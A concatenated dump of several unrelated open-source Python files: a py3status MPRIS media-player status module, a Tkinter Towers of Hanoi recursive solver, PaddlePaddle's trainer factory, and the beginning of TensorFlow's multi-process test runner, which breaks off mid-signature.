{time} played time of the song
{title} name of the song
{nowplaying} now playing field provided by VLC for stream info
Button placeholders:
{next} play the next title
{pause} pause the player
{play} play the player
{previous} play the previous title
{stop} stop the player
{toggle} toggle between play and pause
Color options:
color_control_inactive: button is not clickable
color_control_active: button is clickable
color_paused: song is paused, defaults to color_degraded
color_playing: song is playing, defaults to color_good
color_stopped: song is stopped, defaults to color_bad
Requires:
pydbus: pythonic d-bus library
Tested players:
bomi: powerful and easy-to-use gui multimedia player based on mpv
cantata: qt5 client for the music player daemon (mpd)
mpdris2: mpris2 support for mpd
vlc: multi-platform mpeg, vcd/dvd, and divx player
Examples:
```
mpris {
format = "{previous}{play}{next} {player}: {state} [[{artist} - {title}]|[{title}]]"
format_none = "no player"
player_priority = "[mpd, cantata, vlc, bomi, *]"
}
only show information from mpd and vlc, but mpd has a higher priority:
mpris {
player_priority = "[mpd, vlc]"
}
show information of all players, but mpd and vlc have the highest priority:
mpris {
player_priority = "[mpd, vlc, *]"
}
vlc has the lowest priority:
mpris {
player_priority = "[*, vlc]"
}
```
@author Moritz Lüdecke, tobes, valdur55
SAMPLE OUTPUT
[
{'color': '#00FF00', 'full_text': u'\xab \u25ae \xbb \u25b6 '},
{'color': '#00FF00', 'full_text': u'Happy Mondays - Fat Lady Wrestlers'}
]
"""
from datetime import timedelta
import time
from gi.repository import GObject
from gi.repository.GLib import GError
from threading import Thread
import re
import sys
from pydbus import SessionBus
SERVICE_BUS = "org.mpris.MediaPlayer2"
SERVICE_BUS_URL = "/org/mpris/MediaPlayer2"
STRING_GEVENT = "this module does not work with gevent"
WORKING_STATES = ["Playing", "Paused", "Stopped"]
PLAYING = 0
PAUSED = 1
STOPPED = 2
def _get_time_str(microseconds):
delta = timedelta(seconds=microseconds // 1_000_000)
delta_str = str(delta).lstrip("0").lstrip(":")
if delta_str.startswith("0"):
delta_str = delta_str[1:]
return delta_str
class BrokenDBusMpris:
class PropertiesChanged:
def __init__(self, parent, dbus):
self._dbus = dbus
self._parent = parent
def connect(self, callback):
def combined_function(*args):
callback(*self.filter_messages(*args))
self._subscription = self._dbus.subscribe(signal_fired=combined_function)
def disconnect(self):
self._subscription.disconnect()
# For some reason the dbus subscribe filtering doesn't work
def filter_messages(self, *args):
dbus_params = [
"/org/mpris/MediaPlayer2",
"org.freedesktop.DBus.Properties",
"PropertiesChanged",
]
for i in range(1, 3):
if args[i] != dbus_params[i - 1]:
return ("", {}, [])
# The 6th is a tuple, where the actual data is in the 2nd field
msg = args[4][1]
if msg:
try:
if "PlaybackStatus" in msg:
self._parent.PlaybackStatus = msg["PlaybackStatus"]
if "Metadata" in msg:
self._parent.Metadata = msg["Metadata"]
except KeyError:
pass
return args[4]
def __init__(self, dbus, identity, playback_status):
self._dbus = dbus
self.Identity = identity
self.PlaybackStatus = playback_status
self.PropertiesChanged = BrokenDBusMpris.PropertiesChanged(self, dbus)
self.Metadata = {"xesam:album": None, "xesam:artist": None, "xesam:title": None}
def get(self, key):
data = {"subscription": self.PropertiesChanged._subscription}
return data[key]
class Py3status:
"""
"""
# available configuration parameters
button_next = None
button_previous = None
button_stop = None
button_toggle = 1
format = "[{artist} - ][{title}] {previous} {toggle} {next}"
format_none = "no player running"
icon_next = "\u25b9"
icon_pause = "\u25eb"
icon_play = "\u25b7"
icon_previous = "\u25c3"
icon_stop = "\u25a1"
player_priority = []
state_pause = "\u25eb"
state_play = "\u25b7"
state_stop = "\u25a1"
def post_config_hook(self):
if self.py3.is_gevent():
raise Exception(STRING_GEVENT)
self._dbus = None
self._data = {}
self._control_states = {}
self._kill = False
self._mpris_players = {}
self._mpris_names = {}
self._mpris_name_index = {}
self._player = None
self._player_details = {}
self._tries = 0
# start last
self._dbus = SessionBus()
self._start_listener()
self._states = {
"pause": {
"action": "Pause",
"clickable": "CanPause",
"icon": self.icon_pause,
},
"play": {"action": "Play", "clickable": "CanPlay", "icon": self.icon_play},
"stop": {
"action": "Stop",
"clickable": "True", # The MPRIS API lacks 'CanStop' function.
"icon": self.icon_stop,
},
"next": {
"action": "Next",
"clickable": "CanGoNext",
"icon": self.icon_next,
},
"previous": {
"action": "Previous",
"clickable": "CanGoPrevious",
"icon": self.icon_previous,
},
}
def _init_data(self):
self._data = {
"album": None,
"artist": None,
"error_occurred": False,
"length": None,
"player": None,
"state": STOPPED,
"title": None,
"nowplaying": None,
}
if self._player is None:
self._control_states = {}
return
try:
self._data["player"] = self._player.Identity
playback_status = self._player.PlaybackStatus
self._data["state"] = self._get_state(playback_status)
metadata = self._player.Metadata
self._update_metadata(metadata)
except Exception:
self._data["error_occurred"] = True
def _get_button_state(self, control_state):
try:
# Workaround: The last parameter returns True for the Stop button.
clickable = getattr(self._player, control_state["clickable"], True)
except Exception:
clickable = False
state = self._data.get("state")
if control_state["action"] == "Play" and state == PLAYING:
clickable = False
elif control_state["action"] == "Pause" and state in [STOPPED, PAUSED]:
clickable = False
elif control_state["action"] == "Stop" and state == STOPPED:
clickable = False
return clickable
def _get_state(self, playback_status):
if playback_status == "Playing":
return PLAYING
elif playback_status == "Paused":
return PAUSED
else:
return STOPPED
def _get_text(self):
"""
Get the current metadata
"""
if self._data.get("state") == PLAYING:
color = self.py3.COLOR_PLAYING or self.py3.COLOR_GOOD
state_symbol = self.state_play
elif self._data.get("state") == PAUSED:
color = self.py3.COLOR_PAUSED or self.py3.COLOR_DEGRADED
state_symbol = self.state_pause
else:
color = self.py3.COLOR_STOPPED or self.py3.COLOR_BAD
state_symbol = self.state_stop
if self._data.get("error_occurred"):
color = self.py3.COLOR_BAD
try:
ptime_ms = self._player.Position
ptime = _get_time_str(ptime_ms)
except Exception:
ptime = None
if (
self.py3.format_contains(self.format, "time")
and self._data.get("state") == PLAYING
):
# Don't get trapped in aliasing errors!
update = time.perf_counter() + 0.5
else:
update = self.py3.CACHE_FOREVER
placeholders = {
"player": self._data.get("player"),
"state": state_symbol,
"album": self._data.get("album"),
"artist": self._data.get("artist"),
"length": self._data.get("length"),
"time": ptime,
"title": self._data.get("title") or "No Track",
"nowplaying": self._data.get("nowplaying"),
# for debugging ;p
"full_name": self._player_details.get("full_name"),
}
return (placeholders, color, update)
def _get_control_states(self):
state = "pause" if self._data.get("state") == PLAYING else "play"
self._states["toggle"] = self._states[state]
return self._states
def _get_response_buttons(self):
response = {}
for button, control_state in self._control_states.items():
if self._get_button_state(control_state):
color = self.py3.COLOR_CONTROL_ACTIVE or self.py3.COLOR_GOOD
else:
color = self.py3.COLOR_CONTROL_INACTIVE or self.py3.COLOR_BAD
response[button] = {
"color": color,
"full_text": control_state["icon"],
"index": button,
}
return response
def _start_loop(self):
self._loop = GObject.MainLoop()
GObject.timeout_add(1000, self._timeout)
try:
self._loop.run()
except KeyboardInterrupt:
# This branch is only needed for the test mode
self._kill = True
def _name_owner_changed(self, *args):
player_id = args[5][0]
player_add = args[5][2]
player_remove = args[5][1]
if player_add:
self._add_player(player_id)
if player_remove:
self._remove_player(player_id)
self._set_player()
def _set_player(self):
"""
Sort the current players into priority order and set self._player
Players are ordered by working state, then by preference supplied by
user and finally by instance if a player has more than one running.
"""
players = []
for name, p in self._mpris_players.items():
# we set the priority here as we need to establish the player name
# which might not be immediately available.
if "_priority" not in p:
if self.player_priority:
try:
priority = self.player_priority.index(p["name"])
except ValueError:
try:
priority = self.player_priority.index("*")
except ValueError:
priority = None
else:
priority = 0
if priority is not None:
p["_priority"] = priority
if p.get("_priority") is not None:
players.append((p["_state_priority"], p["_priority"], p["index"], name))
if players:
top_player = self._mpris_players.get(sorted(players)[0][3])
else:
top_player = {}
self._player = top_player.get("_dbus_player")
self._player_details = top_player
self.py3.update()
def _player_monitor(self, player_id):
def player_on_change(*args):
"""
Monitor a player and update its status.
"""
data = args[1]
status = data.get("PlaybackStatus")
if status:
player = self._mpris_players[player_id]
# Note: Workaround. Since all players get noted if playback
# status has been changed we have to check if we are the
# chosen one
try:
dbus_status = player["_dbus_player"].PlaybackStatus
except GError:
# Prevent errors when calling methods of deleted dbus
# objects
return
if status != dbus_status:
# FIXME: WE DON'T RECOGNIZE ANY TITLE CHANGE
return
player["status"] = status
player["_state_priority"] = WORKING_STATES.index(status)
self._set_player()
return player_on_change
def _add_player(self, player_id):
"""
Add player to mpris_players
"""
if not player_id.startswith(SERVICE_BUS):
return False
# Fixes chromium/google-chrome mpris
try:
player = self._dbus.get(player_id, SERVICE_BUS_URL)
except KeyError:
if "chromium" in player_id:
player = BrokenDBusMpris(self._dbus, "Chromium", "Stopped")
elif "chrome" in player_id:
player = BrokenDBusMpris(self._dbus, "Chrome", "Stopped")
else:
return False
if player.Identity not in self._mpris_names:
self._mpris_names[player.Identity] = player_id.split(".")[-1]
for p in self._mpris_players.values():
if not p["name"] and p["identity"] in self._mpris_names:
p["name"] = self._mpris_names[p["identity"]]
p["full_name"] = "{} {}".format(p["name"], p["index"])
identity = player.Identity
name = self._mpris_names.get(identity)
if (
self.player_priority != []
and name not in self.player_priority
and "*" not in self.player_priority
):
return False
if identity not in self._mpris_name_index:
self._mpris_name_index[identity] = 0
status = player.PlaybackStatus
state_priority = WORKING_STATES.index(status)
index = self._mpris_name_index[identity]
self._mpris_name_index[identity] += 1
try:
subscription = player.PropertiesChanged.connect(
self._player_monitor(player_id)
)
except AttributeError:
subscription = {}
self._mpris_players[player_id] = {
"_dbus_player": player,
"_id": player_id,
"_state_priority": state_priority,
"index": index,
"identity": identity,
"name": name,
"full_name": f"{name} {index}",
"status": status,
"subscription": subscription,
}
return True
def _remove_player(self, player_id):
"""
Remove player from mpris_players
"""
player = self._mpris_players.get(player_id)
if player:
if player.get("subscription"):
player["subscription"].disconnect()
del self._mpris_players[player_id]
def _get_players(self):
bus = self._dbus.get("org.freedesktop.DBus")
for player in bus.ListNames():
self._add_player(player)
self._set_player()
def _start_listener(self):
self._dbus.con.signal_subscribe(
None,
"org.freedesktop.DBus",
"NameOwnerChanged",
None,
None,
0,
self._name_owner_changed,
)
self._get_players()
t = Thread(target=self._start_loop)
t.daemon = True
t.start()
def _timeout(self):
if self._kill:
self._loop.quit()
sys.exit(0)
def _update_metadata(self, metadata):
is_stream = False
try:
if len(metadata) > 0:
url = metadata.get("xesam:url")
is_stream = url is not None and "file://" not in url
self._data["title"] = metadata.get("xesam:title")
self._data["album"] = metadata.get("xesam:album")
if metadata.get("xesam:artist"):
self._data["artist"] = metadata.get("xesam:artist")[0]
else:
# we assume here that we playing a video and these types of
# media we handle just like streams
is_stream = True
length_ms = metadata.get("mpris:length")
if length_ms is not None:
self._data["length"] = _get_time_str(length_ms)
else:
# use stream format if no metadata is available
is_stream = True
except Exception:
self._data["error_occurred"] = True
if is_stream and self._data.get("title"):
# delete the file extension
self._data["title"] = re.sub(r"\....$", "", self._data.get("title"))
self._data["nowplaying"] = metadata.get("vlc:nowplaying")
def kill(self):
self._kill = True
def mpris(self):
"""
Get the current output format and return it.
"""
if self._kill:
raise KeyboardInterrupt
current_player_id = self._player_details.get("id")
cached_until = self.py3.CACHE_FOREVER
if self._player is None:
text = self.format_none
color = self.py3.COLOR_BAD
composite = [{"full_text": text, "color": color}]
self._data = {}
else:
self._init_data()
(text, color, cached_until) = self._get_text()
self._control_states = self._get_control_states()
buttons = self._get_response_buttons()
composite = self.py3.safe_format(self.format, dict(text, **buttons))
if self._data.get(
"error_occurred"
) or current_player_id != self._player_details.get("id"):
# Something went wrong or the player changed during our processing
# This is usually due to something like a player being killed
# whilst we are checking its details
# Retry but limit the number of attempts
self._tries += 1
if self._tries < 3:
return self.mpris()
# Max retries hit we need to output something
composite = [
{"full_text": "Something went wrong", "color": self.py3.COLOR_BAD}
]
cached_until = self.py3.time_in(1)
response = {
"cached_until": cached_until,
"color": color,
"composite": composite,
}
# we are outputting so reset tries
self._tries = 0
return response
def on_click(self, event):
"""
Handles click events
"""
index = event["index"]
button = event["button"]
if index not in self._control_states:
if button == self.button_toggle:
index = "toggle"
elif button == self.button_stop:
index = "stop"
elif button == self.button_next:
index = "next"
elif button == self.button_previous:
index = "previous"
else:
return
elif button != 1:
return
try:
control_state = self._control_states.get(index)
if self._player and self._get_button_state(control_state):
getattr(self._player, self._control_states[index]["action"])()
except GError as err:
self.py3.log(str(err).split(":", 1)[-1])
if __name__ == "__main__":
"""
Run module in test mode.
"""
from py3status.module_test import module_test
module_test(Py3status)
|
recursive_solver.py | from tree_viewer import TreeViewer
import Tkinter as tk
import threading
import time
NUM_DISKS = 3
Pole1 = '1'
Pole2 = '2'
Pole3 = '3'
BEGIN = [1,5]
MOVES = {}
MOVES[Pole1, Pole2] = [5,1,4,3,4,1,5,2,]
MOVES[Pole2, Pole1] = [3,5,1,4,2,4,1,5,]
MOVES[Pole1, Pole3] = [5,1,4,3,4,1,1,5,2,5,1,4,]
MOVES[Pole3, Pole1] = [4,1,5,3,5,1,1,4,2,4,1,5,]
MOVES[Pole3, Pole2] = [3,4,1,5,2,5,1,4,]
MOVES[Pole2, Pole3] = [4,1,5,3,5,1,4,2,]
END = [0,0,0,5,5,1]
class RecursiveSolver:
def __init__(self, viewer):
self.num_disks = NUM_DISKS
self.viewer = viewer
def move(self, frm, to):
return MOVES[frm, to]
def dohanoi(self, n, to, frm, using):
if n == 0: return []
level = self.num_disks - n
prefix = ''.join(['\t' for i in range(level)])
self.viewer.display_text(prefix + "At level {0} goal is to move {1} disks from pole {2} to pole {3}".format(level, n, frm, to))
self.viewer.user_pause('')
if n > 1:
self.viewer.display_text(prefix + "Decomposing the problem:")
self.viewer.display_text(prefix + "Move {0} disks from pole {1} to pole {2}".format(n-1, frm, using))
self.viewer.display_text(prefix + "Then move remaining disk from pole {0} to pole {1}".format(frm, to))
self.viewer.display_text(prefix + "Then move {0} disks from pole {1} to pole {2}".format(n-1, using, to))
subgoals = ['Move %s disks from %s to %s' % (n-1, frm, using),
'Move disk from %s to %s' % (frm, to),
'Move %s disks from %s to %s' % (n-1, using, to)]
self.viewer.add_item_viewer("Subgoals", subgoals, -1, [])
self.viewer.user_pause('')
self.viewer.set_active_index(0, level + 1)
self.viewer.display_text(prefix + "Recursing on first subgoal...")
self.viewer.user_pause('')
actions1 = self.dohanoi(n-1, using, frm, to)
self.viewer.add_completed_index(0, level + 1)
self.viewer.set_active_index(1, level + 1)
self.viewer.display_text(prefix + "Handling second subgoal...")
self.viewer.display_text(prefix + "Adding action: Move remaining disk from {0} to {1}".format(frm, to))
self.viewer.user_pause('')
actions2 = self.move(frm, to)
self.viewer.add_completed_index(1, level + 1)
self.viewer.set_active_index(2, level + 1)
self.viewer.display_text(prefix + "Recursing on third subgoal...")
self.viewer.user_pause('')
actions3 = self.dohanoi(n-1, to, using, frm)
self.viewer.add_completed_index(2, level + 1)
plan = actions1 + actions2 + actions3
#self.display_text(prefix + "Back at level {0}, the plan is [{1}]".format(level, ', '.join([str(x) for x in plan])))
self.viewer.display_text(prefix + "Subgoals are completed...")
self.viewer.user_pause('')
self.viewer.remove_last_item_viewer(level + 1)
return actions1 + actions2 + actions3
else:
self.viewer.display_text(prefix + "Entering base case...".format(frm, to))
self.viewer.display_text(prefix + "Adding action: Move single disk from {0} to {1}".format(frm, to))
actions2 = self.move(frm, to)
self.viewer.user_pause('')
return actions2
def solve(self):
time.sleep(0.1)
for a in self.generate_action_list():
continue
def generate_action_list(self):
self.viewer.add_item_viewer("Goal", ['Move %s disks from %s to %s' % (self.num_disks, Pole1, Pole3)], -1, [])
self.viewer.display_text('Starting to Solve!')
self.viewer.user_pause('')
self.viewer.set_active_index(0, 0)
actions = self.dohanoi(self.num_disks, Pole3, Pole1, Pole2)
self.viewer.add_completed_index(0, 0)
self.viewer.display_text('Problem Solved! Please click Execute Plan or close the window to continue!')
self.viewer.user_pause('')
return BEGIN + actions + END
def main():
root = tk.Tk()
root.title('Problem Reduction')
viewer = TreeViewer(root)
solver = RecursiveSolver(viewer)
worker = threading.Thread(target=solver.solve)
worker.daemon = True
worker.start()
tk.mainloop()
worker.join()
if __name__ == "__main__":
main()
|
trainer_factory.py | # Copyright (c) 2019 PaddlePaddle Authors. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""Defination of TrainerFactory."""
import threading
import time
import logging
import numpy as np
from paddle.fluid.log_helper import get_logger
local_logger = get_logger(
__name__, logging.INFO, fmt='%(asctime)s-%(levelname)s: %(message)s')
from .trainer_desc import MultiTrainer, DistMultiTrainer, PipelineTrainer, HeterXpuTrainer, PSGPUTrainer, HeterPipelineTrainer
from .device_worker import Hogwild, DownpourSGD, DownpourLite, Section, DownpourSGDOPT, HeterSection
from .framework import Variable
from multiprocessing import Process, Manager
__all__ = ["TrainerFactory", "FetchHandlerMonitor"]
class TrainerFactory(object):
"""
Create trainer and device worker.
If opt_info is not None, it will get configs from opt_info,
otherwise create MultiTrainer and Hogwild.
"""
def __init__(self):
pass
def _create_trainer(self, opt_info=None):
trainer = None
device_worker = None
if not opt_info:
# default is MultiTrainer + Hogwild
trainer = MultiTrainer()
device_worker = Hogwild()
trainer._set_device_worker(device_worker)
else:
trainer_class = opt_info.get("trainer", "MultiTrainer")
device_worker_class = opt_info.get("device_worker", "Hogwild")
trainer = globals()[trainer_class]()
device_worker = globals()[device_worker_class]()
# for debug tools
if opt_info is not None:
if opt_info.get("trainers") is not None:
trainer._set_trainers(opt_info["trainers"])
if opt_info.get("trainer_id") is not None:
trainer._set_trainer_id(opt_info["trainer_id"])
if opt_info.get("dump_slot") is not None:
trainer._set_dump_slot(opt_info["dump_slot"])
if opt_info.get("mpi_rank") is not None:
trainer._set_mpi_rank(opt_info["mpi_rank"])
if opt_info.get("mpi_size") is not None:
trainer._set_mpi_size(opt_info["mpi_size"])
if opt_info.get("dump_fields") is not None and len(
opt_info.get("dump_fields")) != 0:
trainer._set_dump_fields(opt_info["dump_fields"])
if opt_info.get("dump_fields_path") is not None and len(
opt_info.get("dump_fields_path")) != 0:
trainer._set_dump_fields_path(opt_info["dump_fields_path"])
if opt_info.get("dump_file_num") is not None:
trainer._set_dump_file_num(opt_info["dump_file_num"])
if opt_info.get("dump_converter") is not None:
trainer._set_dump_converter(opt_info["dump_converter"])
if opt_info.get("dump_param") is not None and len(
opt_info.get("dump_param")) != 0:
trainer._set_dump_param(opt_info["dump_param"])
if opt_info.get("worker_places") is not None:
trainer._set_worker_places(opt_info["worker_places"])
if opt_info.get("use_ps_gpu") is not None:
trainer._set_use_ps_gpu(opt_info["use_ps_gpu"])
if opt_info.get("enable_random_dump") is not None:
trainer._set_enable_random_dump(opt_info[
"enable_random_dump"])
if opt_info.get("dump_interval") is not None:
trainer._set_dump_interval(opt_info["dump_interval"])
if opt_info.get("random_with_lineid") is not None:
trainer._set_random_with_lineid(opt_info[
"random_with_lineid"])
if "fleet_desc" in opt_info:
device_worker._set_fleet_desc(opt_info["fleet_desc"])
trainer._set_fleet_desc(opt_info["fleet_desc"])
if opt_info.get("use_cvm") is not None:
trainer._set_use_cvm(opt_info["use_cvm"])
if opt_info.get("no_cvm") is not None:
trainer._set_no_cvm(opt_info["no_cvm"])
if opt_info.get(
"scale_sparse_gradient_with_batch_size") is not None:
trainer._set_scale_sparse_grad_with_batch_size(opt_info[
"scale_sparse_gradient_with_batch_size"])
if opt_info.get("scale_datanorm") is not None:
trainer._set_scale_datanorm(opt_info["scale_datanorm"])
if opt_info.get("adjust_ins_weight") is not None:
trainer._set_adjust_ins_weight(opt_info[
"adjust_ins_weight"])
if opt_info.get("copy_table") is not None:
trainer._set_copy_table_config(opt_info["copy_table"])
if opt_info.get("check_nan_var_names") is not None:
trainer._set_check_nan_var_names(opt_info[
"check_nan_var_names"])
if opt_info.get("loss_names") is not None:
trainer._set_loss_names(opt_info["loss_names"])
trainer._set_device_worker(device_worker)
return trainer
class FetchHandlerMonitor(object):
"""
Defination of FetchHandlerMonitor class,
it's for fetch handler.
"""
def __init__(self, scope, handler):
self.fetch_instance = handler
self.fetch_thread = threading.Thread(
target=self.handler_launch_func, args=(scope, self.fetch_instance))
self.running_lock = threading.Lock()
self.running = False
def handler_launch_func(self, scope, handler):
fetch_instance = handler
period_secs = fetch_instance.period_secs
var_name_to_key = {}
for key in fetch_instance.var_dict:
if isinstance(fetch_instance.var_dict[key], Variable):
var_name_to_key[fetch_instance.var_dict[key].name] = key
else:
local_logger.warning("the value of {} is not a Variable".format(
key))
var_name_to_key["None.var"] = key
elapsed_secs = 0
while True:
self.running_lock.acquire()
if self.running == False:
break
if elapsed_secs < period_secs:
# TODO(guru4elephant): needs customized condition
time.sleep(1)
elapsed_secs += 1
else:
elapsed_secs = 0
fetch_dict = {}
for key in var_name_to_key:
var = scope.find_var(key)
fetch_dict[key] = var
if var == None:
local_logger.warning("{} value currently not available".
format(var_name_to_key[key]))
res_dict = {}
for key in fetch_dict:
user_name = var_name_to_key[key]
if fetch_dict[key] == None:
res_dict[user_name] = None
continue
else:
res_dict[user_name] = fetch_dict[key].get_tensor()
lod = res_dict[user_name].lod()
if len(lod) > 0:
raise RuntimeError("Some of your fetched tensors \
hold LoD information. \
They can not be completely cast \
to Python ndarray. We can \
not return LoDTensor itself directly, \
please choose another targets")
if res_dict[user_name]._is_initialized():
res_dict[user_name] = np.array(res_dict[user_name])
else:
res_dict[user_name] = None
fetch_instance.handler(res_dict)
self.running_lock.release()
def start(self):
"""
start monitor,
it will start a monitor thread.
"""
self.running_lock.acquire()
self.running = True
self.running_lock.release()
self.fetch_thread.setDaemon(True)
self.fetch_thread.start()
def stop(self):
self.running_lock.acquire()
self.running = False
self.running_lock.release()
|
multi_process_runner.py | # Lint as: python3
# Copyright 2019 The TensorFlow Authors. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ==============================================================================
"""Multi-process runner for testing purpose."""
import collections
import contextlib
import json
import os
import signal
import sys
import threading
import time
import unittest
import weakref
from absl import logging
import six
from six.moves import queue as Queue
from tensorflow.python import tf2
from tensorflow.python.compat import v2_compat
from tensorflow.python.distribute import multi_worker_util
from tensorflow.python.distribute import multi_process_lib
from tensorflow.python.eager import context
from tensorflow.python.framework import test_util
from tensorflow.python.util.tf_export import tf_export
multiprocessing = multi_process_lib.multiprocessing
# pylint: disable=g-import-not-at-top
try:
# `faulthandler` is not available in py2.
import faulthandler
except ImportError:
faulthandler = None
# TODO(b/150264776): Remove after resolving CI issue.
try:
import dill
except ImportError:
dill = None
# TODO(b/150264776): Remove after resolving CI issue.
try:
import tblib.pickling_support
# For pickling traceback objects.
tblib.pickling_support.install()
except ImportError:
pass
# _ProcessStatusInfo contains process status information. When is_successful
# attribute is True, the subprocess has ended successfully, or if False, the
# exception stack trace info is stored in exc_info to pass on to parent process
# to be re-raised.
_ProcessStatusInfo = collections.namedtuple(
'_ProcessStatusInfo',
['task_type', 'task_id', 'is_successful', 'exc_info', 'return_value'])
# Information returned from a successful MultiProcessRunner run.
MultiProcessRunnerResult = collections.namedtuple('MultiProcessRunnerResult',
['return_value', 'stdout'])
# visible_gpus: If not None, CUDA_VISIBLE_DEVICES is set to visible_gpus.
TestEnvironment = collections.namedtuple('TestEnvironment', [
'task_type', 'task_id', 'cluster_spec', 'rpc_layer', 'grpc_fail_fast',
'v2_enabled', 'executing_eagerly', 'visible_gpus'
])
# Resources for communication between worker processes and the main process.
#
# `process_status_queue` is used by `multi_process_runner` internally for
# communication from subprocesses to the parent process for whether it's been
# successful, and if not what the error stack trace is.
# `parent_to_sub_queue` is used for communications from parent to subprocess.
# Currently this is only used to terminate subprocesses.
# TODO(rchao): Remove this once subprocess is terminated by SIGKILL.
# `streaming_pipe_w` is to stream stdout and stderr from subprocesses to parent
# process.
# `barrier` is a barrier for the party of all subprocesses.
Resources = collections.namedtuple('Resources', [
'process_status_queue', 'parent_to_sub_queue', 'streaming_pipe_w', 'barrier'
])
# Default time out sec is selected so that it's handled before the default
# "medium" timeout of the test runs.
_DEFAULT_TIMEOUT_SEC = 200
# The timeout in seconds to wait to force kill a child process. When a child
# process times out we first try to SIGTERM it so that it has a chance to dump
# stacktraces. However dumping stacktrace can take a long time.
_FORCE_KILL_WAIT_SEC = 30
class MultiProcessRunner(object):
"""A utility class to start multiple processes to simulate a cluster.
We need to use multiple processes to simulate a cluster in TF 2.0 tests
because TF 2.0 has some process-global data structures that have to be
separated by processes. We also need child processes to test out our fault
tolerance because shutting down a standard TensorFlow server within its
process is not supported.
Note: the main test program that uses this runner class must run main program
via `test_main` defined in this file. Using this runner in non-test binaries
is not supported yet.
This class is not thread-safe. Child processes will inherit TF2 behavior flag.
"""
def __init__(self,
fn,
cluster_spec,
rpc_layer=None,
max_run_time=None,
grpc_fail_fast=None,
stream_output=True,
return_output=False,
use_dill_for_args=True,
daemon=False,
dependence_on_chief=True,
auto_restart=False,
share_gpu=True,
args=None,
kwargs=None):
"""Instantiation of a `MultiProcessRunner`.
Args:
fn: Function to be run on child processes. This will be run on processes
for all task types.
cluster_spec: Dict for cluster spec. The utility function
`tf.__internal__.distribute.multi_process_runner.create_cluster_spec`
can be conveniently used to create such dict. The following is an
example of cluster with three workers and two ps's.
{"worker": ["worker0.example.com:2222",
"worker1.example.com:2222",
"worker2.example.com:2222"],
"ps": ["ps0.example.com:2222",
"ps1.example.com:2222"]}
rpc_layer: RPC layer to use. Default value is 'grpc'.
max_run_time: `None` or integer. If not `None`, child processes are forced
to exit at approximately this many seconds after this utility is called.
We achieve this through `signal.alarm()` api. Note that this is best
effort at Python level since Python signal handler does not get executed
when it runs lower level C/C++ code. So it can be delayed for
arbitrarily long time. If any of the child process is still running when
`max_run_time` is up, they will be force-terminated and an
`UnexpectedSubprocessExitError` may be raised. If `None`, child
processes are not forced to exit.
grpc_fail_fast: Whether GRPC connection between processes should fail
without retrying. Defaults to None, in which case the environment
variable is not explicitly set.
stream_output: True if the output/error from the subprocesses should be
streamed to be printed in parent process' log. Defaults to True.
return_output: If True, the output/error from the subprocesses should be
collected to be attached to the resulting namedtuple returned from
`join()`. The list of output can be retrieved via `stdout` attribute.
Defaults to False.
use_dill_for_args: Whether to use dill to pickle `args` and `kwargs`. dill
can pickle more objects, but doesn't work with types in
`multiprocessing` library like `Mutex`.
daemon: Whether to start processes as daemons.
dependence_on_chief: Whether to terminates the cluster if the chief exits.
If auto_restart is True, it only terminates the cluster if the chief
exits with a zero exit code.
auto_restart: Whether to automatically restart processes that exit with
non-zero exit code.
share_gpu: Whether to share GPUs among workers. If False, each worker is
assigned different GPUs in a roundrobin fashion. This should be True
whenever possible for better test execution coverage; some situations
that need it to be False are tests that runs NCCL.
args: Positional arguments to be sent to `fn` run on subprocesses.
kwargs: Keyword arguments to be sent to `fn` run on subprocesses.
Raises:
RuntimeError: if `multi_process_runner.test_main()` is not called.
ValueError: if there are more than one chief in the `cluster_spec`.
SkipTest: if thread sanitizer is enabled (which is incompatible with MPR).
"""
if test_util.is_tsan_enabled():
raise unittest.SkipTest(
'ThreadSanitizer is not compatible with MultiProcessRunner.')
assert cluster_spec is not None
if 'chief' in cluster_spec and len(cluster_spec['chief']) > 1:
raise ValueError('If chief exists in the cluster, there must be at most '
'one chief. Current `cluster_spec` has {} chiefs.'
.format(len(cluster_spec['chief'])))
_check_initialization()
if not callable(fn):
raise ValueError('fn is not a callable')
self._fn = fn
self._cluster_spec = cluster_spec
self._rpc_layer = rpc_layer or 'grpc'
self._max_run_time = max_run_time
self._grpc_fail_fast = grpc_fail_fast
self._stream_output = stream_output
# TODO(rchao): Revisit return_output argument to consider other solution.
self._return_output = return_output
self._dependence_on_chief = dependence_on_chief
self._use_dill_for_args = use_dill_for_args
self._daemon = daemon
self._auto_restart = auto_restart
self._args = args or ()
self._kwargs = kwargs or {}
self._share_gpu = share_gpu
self._total_gpu = len(context.context().list_physical_devices('GPU'))
# Child processes should have the same v2 and eager behavior.
self._v2_enabled = tf2.enabled()
self._executing_eagerly = context.executing_eagerly()
self._joined = False
self._process_lock = threading.Lock()
# Guarded by self._process_lock.
self._processes = {}
# Record which processes are terminated. Due to a bug in Python<3.7,
# terminated processes return 255 exit code, which should cause an exception
# in join().
# https://bugs.python.org/issue30589
# Guarded by self._process_lock.
self._terminated = set()
self._reading_threads = []
self._manager = manager()
self._process_status_queue = self._manager.Queue()
self._parent_to_sub_queue = self._manager.Queue()
parties = sum(len(addresses) for addresses in self._cluster_spec.values())
self._barrier = self._manager.Barrier(parties)
# We use a queue to collect outputs from worker processes since it's thread
# safe.
self._streaming_queue = self._manager.Queue()
self._watchdog_thread = None
def set_args(self, args=None, kwargs=None):
self._args = args or self._args
self._kwargs = kwargs or self._kwargs
def _continuously_readline_from_sub(self, pipe_r, task_type, task_id):
"""Function to continuously read lines from subprocesses."""
with os.fdopen(pipe_r.fileno(), 'r', closefd=False) as reader:
for line in reader:
task_string = '[{}-{}]:'.format(task_type, task_id)
formatted_line = '{} {}'.format(task_string.ljust(14), line)
if self._stream_output:
# TODO(rchao): Use a lock here to ensure the printed lines are not
# broken.
print(formatted_line, end='', flush=True)
if self._return_output:
self._streaming_queue.put(formatted_line)
def _start_subprocess_and_reading_thread(self,
task_type,
task_id,
cluster_spec=None,
fn=None,
